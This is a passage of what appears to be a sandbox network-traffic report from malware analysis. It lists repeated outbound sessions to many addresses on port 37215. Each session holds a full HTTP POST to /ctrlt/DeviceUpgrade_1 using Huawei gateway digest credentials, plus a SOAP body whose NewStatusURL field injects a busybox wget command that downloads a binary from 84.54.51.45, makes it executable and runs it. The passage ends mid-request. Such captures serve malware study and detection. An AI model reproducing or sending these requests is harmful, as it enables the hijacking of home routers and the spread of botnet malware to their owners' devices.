2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            263192.168.2.1547172197.237.4.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179353952 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            264192.168.2.1546332197.79.80.237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179357052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            265192.168.2.1552564197.232.134.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179380894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            266192.168.2.1550202197.16.105.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179399967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            267192.168.2.1537522197.217.113.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179445982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            268192.168.2.1547554197.69.28.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179455042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            269192.168.2.1557164197.193.95.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179476976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            270192.168.2.1556388197.104.192.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179507017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            271192.168.2.1538330197.241.59.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179527998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            272192.168.2.1556996197.18.53.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179567099 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            273192.168.2.1537222197.55.184.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179595947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
